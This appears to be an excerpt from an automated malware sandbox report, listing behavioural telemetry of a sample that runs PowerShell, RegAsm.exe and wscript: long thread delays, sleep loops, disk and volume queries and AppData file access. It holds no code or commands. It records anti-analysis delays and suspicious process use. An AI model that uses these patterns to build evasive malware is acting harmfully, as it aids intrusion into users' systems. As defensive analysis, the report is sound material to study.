Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5111	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4768	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 921	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 714	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4468	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5295	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5672	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3967	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8825	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 659	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8708
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6721
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6497
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2770
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2810
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6802
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1398
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6614
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2047
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6755
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7232
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1714
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8990
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9638
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5766

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076	Thread sleep count: 5111 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep count: 4768 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep count: 4468 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784	Thread sleep count: 5295 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128	Thread sleep count: 5672 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep count: 3967 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6988	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep count: 8825 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 659 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep count: 8708 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076	Thread sleep count: 877 > 30
Source: C:\Windows\System32\svchost.exe TID: 7452	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1188	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 8362 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 1389 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep count: 8229 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep count: 1453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep count: 1450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep count: 47 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796	Thread sleep count: 6721 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4884	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep count: 1194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8404	Thread sleep count: 9223 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8404	Thread sleep time: -9223000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8404	Thread sleep count: 765 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8404	Thread sleep time: -765000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep count: 7424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200	Thread sleep count: 34 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep count: 1870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep count: 6497 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep count: 2770 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8476	Thread sleep count: 6563 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504	Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464	Thread sleep count: 3240 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8700	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8744	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812	Thread sleep count: 6988 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860	Thread sleep count: 36 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep count: 2810 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984	Thread sleep count: 6802 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984	Thread sleep count: 1080 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168	Thread sleep count: 1398 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9128	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep count: 6614 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276	Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428	Thread sleep count: 3015 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep count: 5856 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8304	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep count: 2047 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736	Thread sleep count: 1443 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8544	Thread sleep count: 6755 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8544	Thread sleep count: 2750 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828	Thread sleep count: 36 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 7232 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228	Thread sleep count: 34 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep count: 2576 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep count: 1443 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1928	Thread sleep count: 67 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888	Thread sleep count: 7780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880	Thread sleep count: 1714 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5332	Thread sleep count: 8332 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752	Thread sleep count: 35 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep count: 1441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep count: 9814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976	Thread sleep count: 33 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep count: 8990 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908	Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1612	Thread sleep count: 9638 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 888	Thread sleep count: 9296 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep count: 32 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep count: 5766 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852	Thread sleep time: -17524406870024063s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
